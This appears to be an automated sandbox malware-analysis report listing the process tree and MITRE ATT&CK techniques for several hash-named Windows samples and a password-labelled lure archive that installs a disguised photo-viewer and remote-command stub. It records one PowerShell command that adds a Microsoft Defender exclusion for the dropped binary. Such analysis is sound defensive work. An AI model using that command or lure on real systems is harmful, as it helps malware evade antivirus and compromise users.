    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb3a7d3cb8,0x7ffb3a7d3cc8,0x7ffb3a7d3cd8
    3⤵
    PID:1716
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1788,4346598624960095010,14452858229156816077,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1904 /prefetch:2
    3⤵
    PID:1500
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1788,4346598624960095010,14452858229156816077,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1372
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1788,4346598624960095010,14452858229156816077,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2732 /prefetch:8
    3⤵
    PID:4712
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1788,4346598624960095010,14452858229156816077,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
    3⤵
    PID:3892
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1788,4346598624960095010,14452858229156816077,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:1
    3⤵
    PID:2672
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1788,4346598624960095010,14452858229156816077,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4656 /prefetch:1
    3⤵
    PID:2836
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1788,4346598624960095010,14452858229156816077,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4784 /prefetch:1
    3⤵
    PID:4340
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1788,4346598624960095010,14452858229156816077,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4664 /prefetch:1
    3⤵
    PID:1880

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5088

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2468

C:\Users\Admin\Desktop\113290aaa5c0b0793d50de6819f2b2eead5e321e9300d91b9a36d62ba8e5bbc1.exe
"C:\Users\Admin\Desktop\113290aaa5c0b0793d50de6819f2b2eead5e321e9300d91b9a36d62ba8e5bbc1.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1660
- C:\Users\Admin\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
  "C:\Users\Admin\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Adds Run key to start application
  - Enumerates connected drives
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:3420
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3316
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:2316

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004B4 0x00000000000004D0
1⤵
PID:4940

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
- System Location Discovery: System Language Discovery
PID:3884

C:\Users\Admin\Desktop\b0c71e2b19b3cde4f32ccf2159ab94beca188ffab5d761f2d610989821c772c3.exe
"C:\Users\Admin\Desktop\b0c71e2b19b3cde4f32ccf2159ab94beca188ffab5d761f2d610989821c772c3.exe"
1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1772

C:\Program Files\WinRAR\WinRAR.exe
"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\Admin\Desktop\«FîleReady▬PassWord▬Is☼◄151422►».7z"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:1416

C:\Program Files\WinRAR\WinRAR.exe
"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\Admin\Desktop\«FîleReady▬PassWord▬Is☼◄151422►».7z"
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4628

C:\Program Files\WinRAR\WinRAR.exe
"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\Admin\Desktop\«FîleReady▬PassWord▬Is☼◄151422►».7z"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: GetForegroundWindowSpam
PID:2096

C:\Program Files\WinRAR\WinRAR.exe
"C:\Program Files\WinRAR\WinRAR.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: GetForegroundWindowSpam
PID:4716

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1080

C:\Users\Admin\Downloads\systeminformer-3.2.25011-release-setup.exe
"C:\Users\Admin\Downloads\systeminformer-3.2.25011-release-setup.exe"
1⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:920
- C:\Program Files\SystemInformer\SystemInformer.exe
  "C:\Program Files\SystemInformer\SystemInformer.exe" -channel release
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  PID:1996
- - C:\Windows\explorer.exe
    "C:\Windows\explorer.exe" /select,"C:\Users\Admin\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe"
    3⤵
    PID:772

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1772
- C:\Users\Admin\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
  "C:\Users\Admin\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Enumerates connected drives
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:1392
- C:\Users\Admin\AppData\Local\Programs\Advanced Photo Studio\remcmdstub.exe
  "C:\Users\Admin\AppData\Local\Programs\Advanced Photo Studio\remcmdstub.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:920

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious use of SendNotifyMessage
PID:756
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb4ed2cc40,0x7ffb4ed2cc4c,0x7ffb4ed2cc58
  2⤵
  PID:1056
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1944,i,6750298637114190070,265709537328727194,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1940 /prefetch:2
  2⤵
  PID:5068
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1728,i,6750298637114190070,265709537328727194,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1608 /prefetch:3
  2⤵
  PID:5108
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2184,i,6750298637114190070,265709537328727194,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2232 /prefetch:8
  2⤵
  PID:1588
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3080,i,6750298637114190070,265709537328727194,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3244 /prefetch:1
  2⤵
  PID:1452
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3164,i,6750298637114190070,265709537328727194,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3272 /prefetch:1
  2⤵
  PID:4336
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4448,i,6750298637114190070,265709537328727194,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4468 /prefetch:1
  2⤵
  PID:2300
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4780,i,6750298637114190070,265709537328727194,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4840 /prefetch:8
  2⤵
  PID:724
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5032,i,6750298637114190070,265709537328727194,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5052 /prefetch:8
  2⤵
  PID:4916
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5188,i,6750298637114190070,265709537328727194,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5204 /prefetch:8
  2⤵
  PID:3540
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5340,i,6750298637114190070,265709537328727194,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5184 /prefetch:8
  2⤵
  PID:2692
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5344,i,6750298637114190070,265709537328727194,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5364 /prefetch:8
  2⤵
  PID:3408
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4832,i,6750298637114190070,265709537328727194,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5204 /prefetch:8
  2⤵
  PID:3312
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4852,i,6750298637114190070,265709537328727194,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5532 /prefetch:2
  2⤵
  PID:1224
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5564,i,6750298637114190070,265709537328727194,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5628 /prefetch:1
  2⤵
  PID:3312
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=3408,i,6750298637114190070,265709537328727194,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4492 /prefetch:1
  2⤵
  PID:1664
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3456,i,6750298637114190070,265709537328727194,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3392 /prefetch:8
  2⤵
  PID:4924
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=5076,i,6750298637114190070,265709537328727194,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3084 /prefetch:1
  2⤵
  PID:3932
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=3480,i,6750298637114190070,265709537328727194,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5376 /prefetch:1
  2⤵
  PID:4992
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=5176,i,6750298637114190070,265709537328727194,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5484 /prefetch:1
  2⤵
  PID:3896
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=3244,i,6750298637114190070,265709537328727194,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3504 /prefetch:1
  2⤵
  PID:624
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=3484,i,6750298637114190070,265709537328727194,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3432 /prefetch:1
  2⤵
  PID:2192
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=5108,i,6750298637114190070,265709537328727194,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3464 /prefetch:8
  2⤵
  PID:3700
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5992,i,6750298637114190070,265709537328727194,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6136 /prefetch:8
  2⤵
  - NTFS ADS
  PID:2868
- C:\Program Files\WinRAR\WinRAR.exe
  "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\Admin\Downloads\1736950955__«FîleReady▬PassWord▬Is☼◄151422►» (1).zip"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: GetForegroundWindowSpam
  PID:3672
- - C:\Program Files\WinRAR\WinRAR.exe
    "C:\Program Files\WinRAR\WinRAR.exe" C:\Users\Admin\AppData\Local\Temp\Rar$DIa3672.48663.rartemp\«FîleReady▬PassWord▬Is☼◄151422►».7z
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Modifies registry class
    PID:2168

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3352

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:5052

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:2944

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
- System Location Discovery: System Language Discovery
PID:4484

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:4692

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Component Object Model Hijacking

T1546.015

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Component Object Model Hijacking

T1546.015

Defense Evasion

Modify Registry

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

System Information Discovery